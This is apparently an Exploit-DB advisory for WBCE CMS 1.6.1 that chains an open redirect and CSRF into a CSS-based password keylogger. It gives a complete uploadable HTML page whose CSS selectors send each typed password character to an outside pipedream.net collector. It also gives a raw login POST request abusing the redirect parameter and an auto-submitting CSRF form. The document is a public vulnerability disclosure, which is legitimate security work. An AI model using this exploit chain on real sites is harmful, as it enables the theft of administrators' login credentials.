WBCE CMS 1.6.1 - Open Redirect & CSRF

EDB-ID:

51566

CVE:

N/A

EDB Verified:

Author:

Mirabbas Ağalarov

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2023-07-03

Vulnerable App: 
Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs:  Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================

1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then you upload html file .(html file content is as below)

'''
<html>
    <head>
        <title>
            Login
        </title>
        <style>
            input[type="password"][value*="q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/q');}
            input[type="password"][value*="w"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/w');}
            input[type="password"][value*="e"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/e');}
            input[type="password"][value*="r"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/r');}
            input[type="password"][value*="t"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/t');}
            input[type="password"][value*="y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/y');}
            input[type="password"][value*="u"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/u');}
            input[type="password"][value*="i"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/i');}
            input[type="password"][value*="o"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/o');}
            input[type="password"][value*="p"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/p');}
            input[type="password"][value*="a"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/a');}
            input[type="password"][value*="s"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/s');}
            input[type="password"][value*="d"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/d');}
            input[type="password"][value*="f"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/f');}
            input[type="password"][value*="g"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/g');}
            input[type="password"][value*="h"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/h');}
            input[type="password"][value*="j"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/j');}
            input[type="password"][value*="k"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/k');}
            input[type="password"][value*="l"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/l');}
            input[type="password"][value*="z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/z');}
            input[type="password"][value*="x"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/x');}
            input[type="password"][value*="c"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/c');}
            input[type="password"][value*="v"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/v');}
            input[type="password"][value*="b"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/b');}
            input[type="password"][value*="n"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/n');}
            input[type="password"][value*="m"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/m');}
            input[type="password"][value*="Q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
            input[type="password"][value*="W"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/W');}
            input[type="password"][value*="E"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/E');}
            input[type="password"][value*="R"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/R');}
            input[type="password"][value*="T"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/T');}
            input[type="password"][value*="Y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
            input[type="password"][value*="U"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/U');}
            input[type="password"][value*="I"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/I');}
            input[type="password"][value*="O"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/O');}
            input[type="password"][value*="P"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/P');}
            input[type="password"][value*="A"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/A');}
            input[type="password"][value*="S"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/S');}
            input[type="password"][value*="D"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/D');}
            input[type="password"][value*="F"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/F');}
            input[type="password"][value*="G"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/G');}
            input[type="password"][value*="H"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/H');}
            input[type="password"][value*="J"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/J');}
            input[type="password"][value*="K"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/K');}
            input[type="password"][value*="L"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/L');}
            input[type="password"][value*="Z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
            input[type="password"][value*="X"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/X');}
            input[type="password"][value*="C"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/C');}
            input[type="password"][value*="V"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/V');}
            input[type="password"][value*="B"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/B');}
            input[type="password"][value*="N"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/N');}
            input[type="password"][value*="M"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/M');}
            input[type="password"][value*="1"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/1');}
            input[type="password"][value*="2"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/2');}
            input[type="password"][value*="3"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/3');}
            input[type="password"][value*="4"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/4');}
            input[type="password"][value*="5"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/5');}
            input[type="password"][value*="6"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/6');}
            input[type="password"][value*="7"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/7');}
            input[type="password"][value*="8"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/8');}
            input[type="password"][value*="9"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/9');}
            input[type="password"][value*="0"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/0');}
            input[type="password"][value*="-"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/-');}
            input[type="password"][value*="."]{
            background-image: url('https://enflownwx6she.x.pipedream.net/.');}
            input[type="password"][value*="_"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
            input[type="password"][value*="@"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
            input[type="password"][value*="?"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
            input[type="password"][value*=">"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
            input[type="password"][value*="<"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
            input[type="password"][value*="="]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
            input[type="password"][value*=":"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
            input[type="password"][value*=";"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
        </style>
    </head>
<body>
    <label>Please enter username and password</label>
    <br><br>
    Password:: <input type="password" />
    <script>
        document.querySelector('input').addEventListener('keyup', (evt)=>{
        evt.target.setAttribute('value', evt.target.value);
        })
   </script>
</body>
</html>
'''

4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)


POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close

url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
 
6.If write as (https://ATTACKER.com) in url parameter on abowe request on  you redirect to attacker.com.
7.We write to html files url

url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html

8.And create csrf-poc with csrf.poc.generator

<html>
  <title>
    This CSRF was found by miri
  </title>
  <body>
    <h1>
      CSRF POC
    </h1>
    <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>


9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.


Poc video : https://youtu.be/m-x_rYXTP9E
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services